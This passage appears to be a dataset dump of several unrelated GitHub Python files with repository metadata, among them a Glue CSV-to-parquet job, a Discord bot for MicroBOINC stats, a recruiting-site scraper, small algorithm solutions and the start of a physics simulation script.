SparkContext()\n self.glueContext = GlueContext(self.sc)\n self.logger = self.glueContext.get_logger()\n self.spark = self.glueContext.spark_session\n self.spark.conf.set(\"spark.sql.sources.partitionOverwriteMode\",\"dynamic\") #to overwrite partitions\n self.job = Job(self.glueContext)\n #Start Spark Job\n self.job.init(self.args['JOB_NAME'], self.args)\n \n\n def read_data(self):\n self.logger.info(\"reading csv file into sparkDF\")\n source_uri = self.args['source_uri'] \n sparkDF = self.spark.read.options(header='True', inferSchema='True', delimiter=',').csv(source_uri)\n sparkDF.printSchema()\n return sparkDF\n\n def save_parquet(self, sparkDF): \n self.logger.info(\"Repartition and save as parquet\")\n output_uri = self.args['output_uri']\n sparkDF= sparkDF.withColumn(\"loan_date\", f.from_unixtime(f.unix_timestamp(sparkDF.loan_date), \"yyyy-MM-dd\")) \n sparkDF = sparkDF.repartition('loan_date') \n sparkDF.write.mode('overwrite').format('parquet').partitionBy('loan_date').save(output_uri) \n\n def main(self):\n sparkDF = self.read_data() \n self.save_parquet(sparkDF)\n \n self.job.commit()\n\nif __name__ == \"__main__\": \n my_args = ['JOB_NAME',\n 'source_uri',\n 'output_uri'] \n parser = argsGet(my_args)\n args = parser.loaded_args\n\n csv_to_parquet = CsvToParquet(args)\n 
csv_to_parquet.main()","repo_name":"jagimene/mlops-datapipeline-modeltraining","sub_path":"glue/fe_to_parquet.py","file_name":"fe_to_parquet.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38980148796","text":"import discord\nfrom time import time\nfrom discord.ext import commands\nfrom discord_slash import cog_ext, SlashContext\nfrom discord_slash.utils.manage_commands import create_option, create_choice\n\nfrom config import config\nfrom main import notauthorized\nfrom utils import stats, leaderboard, microboincapi\nfrom config.config import rootdir, apikeyselfcreationisallowed\n\n\nclass Microboinc(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_createapikey, base=\"microboinc\", name=\"createapikey\", options=[\n create_option(\n name=\"nickname\",\n description=\"The nickname for microboinc!\",\n option_type=3,\n required=True\n ),\n create_option(\n name=\"user\",\n description=\"Only needed if you want to create an API-Key for some one else!\",\n option_type=6,\n required=False\n )\n ])\n async def _microboinc_createapikay(self, ctx: SlashContext, nickname: str, user: discord.Member = None):\n apifor = ctx.author\n if (user is None or user == ctx.author) and not apikeyselfcreationisallowed:\n await ctx.send(\"This feature is currently disabled!\")\n return\n\n if user is not None and user != ctx.author:\n await ctx.send(\"Not implementet yet!\")\n return\n if not microboincapi.isapilevelbyid(ctx.author_id, 2):\n await notauthorized(ctx)\n return\n apifor = user\n\n success, res = microboincapi.register(nickname, apifor.id)\n if not success:\n await ctx.send(res)\n return\n\n apikey = res\n try:\n await apifor.send(content=f\"Microboinc account created:\\nNickname: {nickname}\\nAPI-Key: {apikey}\")\n await ctx.send(content=f\"API-Key for {nickname}({apifor.mention}) created and send to their DMs.\")\n except discord.Forbidden:\n await ctx.send(hidden=True, content=f\"!Couldn't send API-Key to DMS!\\n\"\n f\"!THIS MESSAGE IS ONLY VISIBLE TO YOU!\\n\"\n f\"Microboinc account created for {apifor.mention}:\\n\"\n f\"Nickname: {nickname}\\n\"\n f\"API-Key: {apikey}\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_regenapikey, base=\"microboinc\", name=\"regenapikey\", options=[\n create_option(\n name=\"user\",\n description=\"Only needed if you want to regen an API-Key for some one else!\",\n option_type=6,\n required=False\n )\n ])\n async def _microboinc_regenapikey(self, ctx: SlashContext, user: discord.Member = None):\n await ctx.send(\"not available yet\")\n return;\n apifor = ctx.author\n if user is not None and user != ctx.author:\n if not microboincapiold.isapilevelbyid(ctx.author_id, 4):\n await notauthorized(ctx)\n return\n apifor = user\n\n success, res = microboincapiold.regen(apifor.id)\n if not success:\n await ctx.send(\"Something went wrong:\\n\" + res)\n return\n\n apikey = res\n try:\n await apifor.send(content=f\"Microboinc API-Key regened:\\nAPI-Key: {apikey}\")\n await ctx.send(content=f\"API-Key regened and send to their DMs.\")\n except discord.Forbidden:\n await ctx.send(hidden=True, content=f\"!Couldn't send API-Key to DMS!\\n\"\n f\"!THIS MESSAGE IS ONLY VISIBLE TO YOU!\\n\"\n f\"Microboinc account created for {apifor.mention}:\\n\"\n f\"API-Key: {apikey}\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_deletebyid, base=\"microboinc\", name=\"deletebyid\", 
options=[\n create_option(\n name=\"user\",\n description=\"The User you want to delete.\",\n option_type=6,\n required=True\n )\n ])\n async def _microboinc_deletebyid(self, ctx: SlashContext, user: discord.Member):\n await ctx.send(\"not available yet\")\n return\n if not microboincapiold.isapilevelbyid(ctx.author_id, 3):\n await notauthorized(ctx)\n return\n\n success, res = microboincapiold.deletebyid(user.id)\n\n if not success:\n await ctx.send(\"Something went wrong:\\n\" + res)\n return\n\n await ctx.send(content=f\"User({user.mention}) has been deleted.\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_results, base=\"microboinc\", name=\"results\", options=[\n create_option(\n name=\"appid\",\n description=\"The appid form microboinc.\",\n option_type=3,\n required=True\n )\n ])\n async def _microboinc_results(self, ctx: SlashContext, appid: int):\n\n #if not microboincapiold.isapilevelbyid(ctx.author_id, 1):\n # await notauthorized(ctx)\n # return\n\n m = await ctx.send(\"fetching data please wait a moment.\")\n foname = f'{int(time())}_results{appid}.txt'\n fname = f'{rootdir}/results/{int(time())}_results{appid}.txt'\n suc, res = microboincapi.getresultsbyappid(appid)\n if not suc:\n await m.edit(content=f\"Something went wrong: {res}\")\n return\n with open(fname, \"w\") as f:\n f.write(res)\n\n await m.edit(content=f\"Here are the results for app: {appid}\\nhttps://results.microboinc.com/{foname}\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_leaderboard, base=\"microboinc\", name=\"leaderboard\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID from the project you want the leaderboard from!\",\n option_type=4,\n required=True\n ), create_option(\n name=\"type\",\n description=\"The type of chart you want!\",\n option_type=3,\n required=False,\n choices=[\n create_choice(\n name=\"Graph\",\n value=\"1\"\n ),\n create_choice(\n name=\"Pie\",\n value=\"2\"\n )\n ]\n )\n ])\n async def _microboinc_leaderboard(self, ctx: SlashContext, projectid: int, type: str = \"1\"):\n fname = f'{rootdir}/leaderboards/{int(time())}_leaderboard-{projectid}.png'\n\n if type == \"1\":\n success, res = microboincapi.getleaderboardbyid(projectid)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.graph(fname, projectid, res)\n\n elif type == \"2\":\n success, res = microboincapi.getleaderboardbyid(projectid)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.pie(fname, projectid, res)\n\n await ctx.send(content=f\"The current Leaderboard for Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_userleaderboard, base=\"microboinc\", name=\"userleaderboard\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID from the project you want the leaderboard from!\",\n option_type=4,\n required=True\n ), create_option(\n name=\"user\",\n description=\"The User you want the stats for.\",\n option_type=6,\n required=True\n ), create_option(\n name=\"type\",\n description=\"The type of chart you want!\",\n option_type=3,\n required=False,\n choices=[\n create_choice(\n name=\"Graph\",\n value=\"1\"\n ),\n create_choice(\n name=\"Pie\",\n value=\"2\"\n )\n ]\n )\n ])\n async def _microboinc_userleaderboard(self, ctx: SlashContext, projectid: int, user: discord.User, type: str = \"1\"):\n fname = 
f'{rootdir}/leaderboards/{int(time())}_userleaderboard-{projectid}.png'\n if type == \"1\":\n success, res = microboincapi.getleaderboardbyidforuser(projectid, user.id)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.graph(fname, projectid, res)\n\n elif type == \"2\":\n success, res = microboincapi.getleaderboardbyidforuser(projectid, user.id)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.pie(fname, projectid, res)\n await ctx.send(content=f\"The current Leaderboard from {user.mention} for Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_progress, base=\"microboinc\", name=\"progress\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID from the project you want the progress for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_progress(self, ctx: SlashContext, projectid: int):\n success, res = microboincapi.getprogressbyappid(projectid)\n\n if not success:\n await ctx.send(\"Something went wrong:\\n\" + res)\n return\n\n await ctx.send(content=f\"The progress of the Project: {res['name']}\\n\"\n f\"{res['totalDone']} / {res['totalGenerated']} ({(res['totalDone'] / res['totalGenerated'] * 100) if res['totalGenerated'] != 0 else 0}%)\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_multipoints, base=\"microboinc\", name=\"stats-multipoints\",\n options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_stats_multipoints(self, ctx: SlashContext, projectid: int):\n fname = f'{rootdir}/stats/{int(time())}_stats-multipoints-{projectid}.png'\n m = await ctx.send(\"Please wait a moment, it can take a while to generate the Image.\")\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n\n if not success:\n await m.edit(content=res)\n return\n\n if not res[\"entries\"]:\n await m.edit(content=\"There is not data yet!\")\n return\n\n stats.multipoints(fname, projectid, res)\n await m.edit(content=f\"Total points stats for Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_singlepoints, base=\"microboinc\", name=\"stats-singlepoints\",\n options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n ), create_option(\n name=\"user\",\n description=\"The User you want the stats for.\",\n option_type=6,\n required=True\n )\n ])\n async def _microboinc_stats_singlepoints(self, ctx: SlashContext, projectid: int, user: discord.User):\n m = await ctx.send(\"Please wait a moment, it can take a while to generate the Image.\")\n userid = user.id\n\n fname = f'{rootdir}/stats/{int(time())}_stats-singlepoints-{projectid}-{userid}.png'\n\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n if not success:\n await m.edit(content=\"Something went wrong!\")\n return\n\n stats.singlepoints(fname, projectid, userid, res)\n await m.edit(content=f\"Single points stats from: {user.mention} Project: {projectid}\",\n files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_totalpoints, base=\"microboinc\", name=\"stats-totalpoints\",\n options=[\n create_option(\n name=\"projectid\",\n 
description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_stats_totalpoints(self, ctx: SlashContext, projectid: int):\n fname = f'{rootdir}/stats/{int(time())}_stats-totalpoints-{projectid}.png'\n m = await ctx.send(\"Please wait a moment, it can take up to a minute to generate the Image.\")\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n\n if not success:\n await m.edit(content=\"Something went wrong!\")\n return\n\n stats.totalpoints(fname, projectid, res)\n\n await m.edit(content=f\"Total points from Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_totalhourlypoints, base=\"microboinc\",\n name=\"stats-totalhourlypoints\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_stats_totalhourlypoints(self, ctx: SlashContext, projectid: int):\n fname = f'{rootdir}/stats/{int(time())}_stats-totalhourlypoints-{projectid}.png'\n m = await ctx.send(\"Please wait a moment, it can take up to a minute to generate the Image.\")\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n if success:\n stats.totalhourlypoints(fname, projectid, res)\n else:\n await m.edit(content=\"Something went wrong!\")\n return\n\n await m.edit(content=f\"Totalhourlypoins stats from Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_singlehourlypoints, base=\"microboinc\",\n name=\"stats-singlehourlypoints\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n ), create_option(\n name=\"user\",\n description=\"The User you want the stats for.\",\n option_type=6,\n required=True\n ), create_option(\n name=\"internaluseridoverride\",\n description=\"The internal ID from the user(overrides the discord user)\",\n option_type=4,\n required=False\n )\n ])\n async def _microboinc_stats_singlehourlypoints(self, ctx: SlashContext, projectid: int, user: discord.User,\n internaluseridoverride: int = None):\n await ctx.send(\"not available yet\")\n return;\n m = await ctx.send(\"Please wait a moment, it can take up to a minute to generate the Image.\")\n\n userid = internaluseridoverride\n username = f\"OVERRIDE-{userid}\"\n if internaluseridoverride is None:\n uisuc, uires = microboincapiold.getuserinfobyid(user.id)\n if not uisuc:\n await m.edit(content=f\"User not found: {user.name}({user.id})\")\n return\n userid = uires[\"User\"][\"ID\"]\n username = uires[\"User\"][\"Username\"]\n\n fname = f'{rootdir}/stats/{int(time())}_stats-singlehourlypoints-{projectid}-{userid}.png'\n\n success, res = microboincapiold.gethistleaderboardbyid(projectid)\n if success:\n stats.singlehourlypoints(fname, projectid, userid, username, res)\n else:\n await m.edit(content=\"Something went wrong!\")\n return\n\n await m.edit(content=f\"Singlehourlypoints stats from: {username} Project: {projectid}\",\n files=[discord.File(fname)])\n\n\ndef setup(bot):\n bot.add_cog(Microboinc(bot))\n","repo_name":"ItzN00bPvP/realN00bBot","sub_path":"cogs/microboinc.py","file_name":"microboinc.py","file_ext":"py","file_size_in_byte":17248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"37682205092","text":"class Solution:\n def 
numberOfUniqueGoodSubsequences(self, binary: str) -> int:\n next_ = [None, None]\n nexts = [[] for _ in range(len(binary))]\n for idx in reversed(range(len(binary))):\n value = int(binary[idx])\n nexts[idx] = next_[::]\n next_[value] = idx\n \n \n @lru_cache(None)\n def dp(index):\n \n total = 1\n if nexts[index][1] is not None:\n total += dp(nexts[index][1])\n \n if nexts[index][0] is not None:\n total += dp(nexts[index][0])\n return total\n \n total = min(binary.count(\"0\"), 1)\n \n if next_[1] is not None:\n total += dp(next_[1])\n \n return total % (7 + 10 ** 9)\n \n \n \n ","repo_name":"Henok-Matheas/competitive_programming","sub_path":"1987-number-of-unique-good-subsequences/1987-number-of-unique-good-subsequences.py","file_name":"1987-number-of-unique-good-subsequences.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24810864386","text":"#!/usr/bin/env python\n\nimport time\n\nimport matplotlib.pyplot as plt\n\nfrom multiprocessing import Process\n\nmonths = [\n\t\t\"January\",\n\t\t\"February\",\n\t\t\"March\",\n\t\t\"April\",\n\t\t\"May\",\n\t\t\"June\",\n\t\t\"July\",\n\t\t\"August\",\n\t\t\"September\",\n\t\t\"October\",\n\t\t\"November\",\n\t\t\"December\"\n\t]\n\ndef preprocess_csv():\n\n\ttry:\n\t\tdata = open('commit_data.csv')\n\texcept:\n\t\tprint(\"ERROR: CSV file not found\")\n\n\tlist_data = []\n\tfor commit in data:\n\t\tlist_data.append(commit.replace(\"\\n\", \"\").split(\",\"))\n\n\tsorted_data = sorted(list_data, key=lambda x : x[0], reverse=True)[1:]\n\n\tprocessed_data = []\n\tfor commit in sorted_data:\n\t\tprocessed_data.append({\n\t\t\t\"year\" : int(commit[0]),\n\t\t\t\"month\" : int(commit[1]),\n\t\t\t\"author\" : commit[2],\n\t\t\t\"additions\" : int(commit[3]),\n\t\t\t\"deletions\" : int(commit[4])\n\t\t\t})\n\t\n\tdata.close()\n\n\treturn processed_data\n\ndef show_year_charts(year, year_data):\n\n\tfig, axes = plt.subplots(2, len(year_data), figsize=(15, 5))\t\n\n\ti = 0\n\tfor month, data in year_data.items():\n\n\t\tdate = months[month-1]\n\t\tlabels = list(data.keys())\n\t\tadditions = [commit_data[\"additions\"] for author, commit_data in data.items()]\n\t\tdeletions = [commit_data[\"deletions\"] for author, commit_data in data.items()]\n\t\t\t\n\t\tprint(year, date)\n\t\tprint(f\"\\t authors: {labels}\")\n\t\tprint(f\"\\t additions: {additions}\")\n\t\tprint(f\"\\t deletions: {deletions}\")\n\n\t\taxes[0][i].set_title(f\"{date}\")\n\t\t\n\t\tif len(additions) == 1 and additions[0] == 0:\n\t\t\tpass\n\t\telse:\n\t\t\taxes[0][i].pie(additions, shadow=True, startangle=90, autopct='%1.2f%%', radius=1.45)\n\t\t\taxes[0][i].legend(labels, loc=\"best\")\n\t\t\n\t\tif len(deletions) == 1 and deletions[0] == 0:\n\t\t\tpass\n\t\telse:\n\t\t\taxes[1][i].pie(deletions, shadow=True, startangle=90, autopct='%1.2f%%', radius=1.45)\n\t\t\taxes[1][i].legend(labels, loc=\"best\")\n\n\t\ti = i + 1\n\tprint()\n\n\tfig.suptitle(f\"Charts for the year {year} organised by additions (top) and deletions (bottom)\")\n\t\n\tplt.show()\n\ndef process_year_data(year_data):\n\t\n\tprocessed_year_data = {}\n\n\tcurrent_month = year_data[0][\"month\"]\n\t\n\tfor commit in year_data:\n\n\t\tif commit[\"month\"] not in processed_year_data:\n\t\t\tprocessed_year_data.update({\n\t\t\t\tcommit[\"month\"] : {\n\t\t\t\t\tcommit[\"author\"] : {\n\t\t\t\t\t\t\"additions\" : commit[\"additions\"],\n\t\t\t\t\t\t\"deletions\" : 
commit[\"deletions\"]\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t})\n\n\t\telse:\n\t\t\tif commit[\"author\"] in processed_year_data[commit[\"month\"]]:\n\t\t\t\tprocessed_year_data[commit[\"month\"]][commit[\"author\"]][\"additions\"] = processed_year_data[commit[\"month\"]][commit[\"author\"]][\"additions\"] + commit[\"additions\"]\n\t\t\t\tprocessed_year_data[commit[\"month\"]][commit[\"author\"]][\"deletions\"] = processed_year_data[commit[\"month\"]][commit[\"author\"]][\"deletions\"] + commit[\"deletions\"] \n\t\t\telse:\n\t\t\t\tprocessed_year_data[commit[\"month\"]].update({\n\t\t\t\t\tcommit[\"author\"] : {\n\t\t\t\t\t\t\"additions\" : commit[\"additions\"],\n\t\t\t\t\t\t\"deletions\" : commit[\"deletions\"]\n\t\t\t\t\t}\n\t\t\t\t})\n\n\treturn processed_year_data\n\ndef process_data(data):\n\t\n\tcurrent_year = int(data[0][\"year\"])\n\n\tyear_data = []\n\n\ttask = None\n\tfor commit in data:\n\t\tif commit[\"year\"] != current_year or commit == data[len(data)-1]:\n\t\n\t\t\tprocessed_year_data = process_year_data(year_data)\n\t\t\t\n\t\t\tif task is not None:\n\t\t\t\ttime.sleep(5)\n\t\t\t\ttask.terminate()\n\n\t\t\ttask = Process(target=show_year_charts, args=[current_year, processed_year_data])\n\t\t\ttask.start()\n\t\t\t\n\t\t\tyear_data = [commit]  # keep the commit that triggered the year change\n\t\t\tcurrent_year = commit[\"year\"]\n\t\telse:\n\t\t\tyear_data.append(commit)\n\t\t\nif __name__ == \"__main__\":\n\tdata = preprocess_csv()\n\tprocess_data(data)\n","repo_name":"Tepja16/Reassessment-Task-CSU33012","sub_path":"final_project.py","file_name":"final_project.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26559991160","text":"from google.cloud import aiplatform\n\n\ndef create_feature_sample(\n    project: str,\n    featurestore_id: str,\n    entity_type_id: str,\n    feature_id: str,\n    value_type: aiplatform.gapic.Feature.ValueType,\n    description: str = \"sample feature\",\n    location: str = \"us-central1\",\n    api_endpoint: str = \"us-central1-aiplatform.googleapis.com\",\n    timeout: int = 300,\n):\n    # The AI Platform services require regional API endpoints, which need to be\n    # in the same region or multi-region overlap with the Feature Store location.\n    client_options = {\"api_endpoint\": api_endpoint}\n    # Initialize client that will be used to create and send requests.\n    # This client only needs to be created once, and can be reused for multiple requests.\n    client = aiplatform.gapic.FeaturestoreServiceClient(client_options=client_options)\n    parent = f\"projects/{project}/locations/{location}/featurestores/{featurestore_id}/entityTypes/{entity_type_id}\"\n    create_feature_request = aiplatform.gapic.CreateFeatureRequest(\n        parent=parent,\n        feature=aiplatform.gapic.Feature(\n            value_type=value_type, description=description\n        ),\n        feature_id=feature_id,\n    )\n    lro_response = client.create_feature(request=create_feature_request)\n    print(\"Long running operation:\", lro_response.operation.name)\n    create_feature_response = lro_response.result(timeout=timeout)\n    print(\"create_feature_response:\", create_feature_response)\n\n\n# [END aiplatform_create_feature_sample]\n","repo_name":"googleapis/python-aiplatform","sub_path":"samples/snippets/feature_store_service/create_feature_sample.py","file_name":"create_feature_sample.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"68"} +{"seq_id":"12085832771","text":"import string\n\nfrom ..hash_map import 
HashTable\n\n\ndef repeated_word(sentence: str) -> str:\n    hash_table = HashTable()\n    # region docs\n    \"\"\"\n    finds the first word that occurs more than once in a string\n\n    Args:\n        sentence (str): sentences as string of length n\n\n    Returns:\n        str: the first word that is repeated more than once in the given string\n    \"\"\"\n    # endregion\n\n    for word in sentence.lower().split():\n\n        word = word.strip(string.punctuation)\n\n        try:\n\n            hash_table.get(word)\n\n            return word\n\n        except:  # get() raises when the word has not been seen yet\n            hash_table.add(word, word)\n","repo_name":"odehabuzaid/data-structures-and-algorithms","sub_path":"python/code_challenges/hashmap/repeted_words/repeated.py","file_name":"repeated.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"23038006441","text":"# Code by Thomas Hagebols\n# Github account: ThomasHagebols\n# LinkedIn account: https://www.linkedin.com/in/thomas-hagebols/\n# Date: 2017-04-21\n\nfrom preamble import *\nimport player_parse\nfrom pathlib import Path\n\nimport pprint\nimport time\nimport random\n\npp = pprint.PrettyPrinter(indent=1)\nrandom.seed()\n\n# Parse the list of URLs of all players\ndef get_players(url, year):\n    # Load page\n    page = requests.get(url)\n    tree = html.fromstring(page.content)\n\n    # Retrieve JSON\n    json_data = tree.xpath('//rv-commitments/@prospects')\n    parsed_json = json.loads(json_data[0])\n\n    # Get list of URLs\n    urls = []\n    for player in parsed_json:\n        if player['year'] == year and player['sport'] == \"Football\":\n            urls.append(player['url'])\n\n        # print(player['name'])\n        # print(player['url'])\n        # print(player['id'])\n        # print(player['stars'])\n        # print(player['rivals_rating'])\n        # print(player['year'])\n\n    return urls\n\n# Get the id of a college belonging to a certain url\ndef get_college_id(url):\n    url_list = get_players(url, 2010)\n    player_info = player_parse.parse_player_page(url_list[0])\n\n    college_info = player_info[player_info.commit == True].values.tolist()\n    college_info = college_info[0]\n    college_info.append(url)\n\n    return college_info\n\n    # TODO filter where the row is True\n\ndef process_players(urls, win_bet_col_id):\n    matrix_operations = []\n    player_urls_with_errors = []\n\n    # Add sleep to fool the firewall of the server\n    n = random.random()\n    time.sleep(n*2)\n\n\n    for i, url in enumerate(urls):\n        print(\"\\nParsing player\", i+1, \"of\", len(urls), \"url:\", url)\n        try:\n            player_info = player_parse.parse_player_page(url)\n            # print(player_info)\n\n            lost_bets = player_info[player_info.college_id != win_bet_col_id]['college_id']\n\n            for lost_bet_col_id in lost_bets:\n                # print(lost_bet_col_id)\n                matrix_operations.append((lost_bet_col_id,win_bet_col_id))\n        except:\n            print('Failed to parse this player. 
Url added to error list')\n player_urls_with_errors.append(url)\n\n return matrix_operations, player_urls_with_errors\n\ndef do_operations(adjacency_matrix, operations, colleges_pd):\n # Perform all operations in the operation list on the adjacency matrix\n for operation in operations:\n # Only apply operations of colleges which should in the final dataset\n if any(colleges_pd.college_id == operation[0]):\n x = colleges_pd[colleges_pd.college_id == operation[0]].index.tolist()\n y = colleges_pd[colleges_pd.college_id == operation[1]].index.tolist()\n adjacency_matrix[x,y] += 1\n\n # print('changing value of ',operation)\n # print('maps to:', x,y)\n # print('Has value', adjacency_matrix[x,y])\n\n # input(\"Press Enter to continue...\")\n\n return\n\n\n\n# To test the individual script\nif __name__ == \"__main__\":\n data_path = 'data/'\n player_urls_with_errors = []\n\n\n # get college information\n # Check if csv with college info file exists\n if Path(data_path + 'colleges_info.csv').is_file():\n # import the data from the csv\n colleges_pd = pd.read_csv(data_path + 'colleges_info.csv')\n else:\n college_urls = pd.read_csv(data_path + 'universities.csv', names=['abbrivation', 'url'])\n # create the csv\n colleges = []\n for college_url in college_urls['url']:\n print(college_url)\n colleges.append(get_college_id(college_url))\n\n colleges_pd = pd.DataFrame(colleges, columns=['college_id', 'college_name', 'commit', 'url'])\n colleges_pd.to_csv(data_path + 'colleges_info.csv')\n\n for year in range(2003, 2014):\n print('Processing year:', year)\n adjacency_matrix = np.zeros((len(colleges_pd.index), len(colleges_pd.index)))\n matrix_operations=[]\n\n for index, college in colleges_pd.iterrows():\n print('Processing college', index, 'of', len(colleges_pd.index))\n url_list = get_players(college.url, year)\n\n op, puwe = process_players(url_list, college.college_id)\n\n player_urls_with_errors += puwe\n matrix_operations += op\n print(matrix_operations)\n print(player_urls_with_errors)\n\n # matrix_operations = filter(matrix_operations, colleges_pd.college_id)\n\n # Apply operations to matrix\n do_operations(adjacency_matrix, matrix_operations, colleges_pd)\n pd.DataFrame(adjacency_matrix).to_csv(data_path + str(year)+'.csv')\n\n pd.DataFrame(player_urls_with_errors).to_csv(data_path + 'pages_with_errors.csv')","repo_name":"ThomasHagebols/RivalsParser","sub_path":"team_parse.py","file_name":"team_parse.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40741934709","text":"#!/usr/bin/env python3\n\nfrom collections import Counter\n\ndef word_count(str):\n\t# split string on every whitespace character (space, tab, newline)\n\twords = str.split()\n\n\t# use a special data structure, a Counter, to count the number of\n\t# elements in an iterable.\n\t# This is basically the same as\n\t# for w in words:\n\t# if not w in counter:\n\t# counter[w] = 1\n\t# else:\n\t# counter[w] += 1\n\tcounts = Counter(words)\n\treturn counts\n\nif __name__ == '__main__':\n\tword_count('Lorem Ipsum dolor sit amet.')\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/word-count/1b045f029c3c4afb89135592dc833d75.py","file_name":"1b045f029c3c4afb89135592dc833d75.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"27347752213","text":"# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on Tue May 30 09:55:49 2023\r\n\r\n@author: Sigrid Aunsmo \r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport scipy as sp\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom tqdm import trange\r\n\r\nimport functions as func \r\nimport save_and_load_data as data \r\n\r\n# def new_Es():\r\n# E1 = np.linspace(0.0001,0.2,15)\r\n# E2 = np.linspace(0.2001,0.9,15)\r\n# E3 = np.linspace(0.9001,1.2,20)\r\n# E4 = np.linspace(1.2001,3,5)\r\n# return np.concatenate((E1,E2,E3,E4))\r\n \r\ndef new_Es():\r\n #E1 = np.linspace(0.001,0.2,15)\r\n #E2 = np.linspace(0.2001,0.9,15)\r\n #E3 = np.linspace(0.9001,1.2,20)\r\n #E4 = np.linspace(1.2001,3,5)\r\n #return np.concatenate((E1,E2,E3,E4))\r\n #E1 = np.linspace(0.001,0.99,100)\r\n #E2 = np.linspace(1.001,3,20)\r\n #return np.concatenate((E1,E2))\r\n #return np.linspace(0.0001,2,301)\r\n #return np.concatenate((np.linspace(0.0001,1.5,101), np.linspace(1.6,3,20)))\r\n return np.concatenate((np.linspace(0.0001,0.07,50),np.linspace(0.08,1.5,90), np.linspace(1.6,3,20)))\r\n\r\n\r\nEs = new_Es()\r\n\r\n\r\n\r\n\r\n#filename = 'temperature_dependecy_of_mx_2' #L = 8 #\r\n#filename = 'temperature_dependecy_of_mx_3' #L = 1\r\n#filename = 'temperature_dependecy_of_mx_4' #L = 2\r\nfilename = 'temperature_dependecy_of_mx_5' #L = 1, \r\nfilename = 'temperature_dependecy_of_mx_6' \r\nfilename = 'temperature_dependecy_of_mx_7' \r\nfilename = 'temperature_dependecy_of_mx_8' \r\nfilename = 'temperature_dependecy_of_mx_9' \r\nfilename = 'mx_of_T' #did not seem to be good enough... \r\nfilename = 'mx_of_T_2'\r\n\r\nfunc.deltaE = 0.01 #1e-6 ##1e-3\r\nfunc.nx = 500\r\nfunc.L = 8\r\nfunc.nnodes = 1000 #max nodes for scipy solve_bvp \r\nfunc.t = 1e-4 #tolerance for scipy solve_bvp \r\nfunc.nm = 8\r\nyv_init = np.zeros((32,func.nx), dtype = complex)\r\nfunc.id2 = np.eye(2, dtype = complex)\r\nfunc.x = np.linspace(0,func.L,func.nx) # Es = np.concatenate(np.linspace(0.0001,1.5,351), np.linpace(1.6,3,10))\r\nfunc.Lh = 3\r\n\r\n#beta_prime = 20\r\n\r\n#Ts = np.linspace(0.01,0.99,30)\r\nTs = np.linspace(0.01,0.99,40)\r\nbetas_prime = 1/Ts\r\n\r\n'''Josepshoson junction parameters'''\r\nfunc.h0 = np.array([0,0,0])\r\nfunc.bc_left = func.bc_KL\r\nfunc.bc_right = func.bc_KL\r\nfunc.omega = 0.01\r\nphi 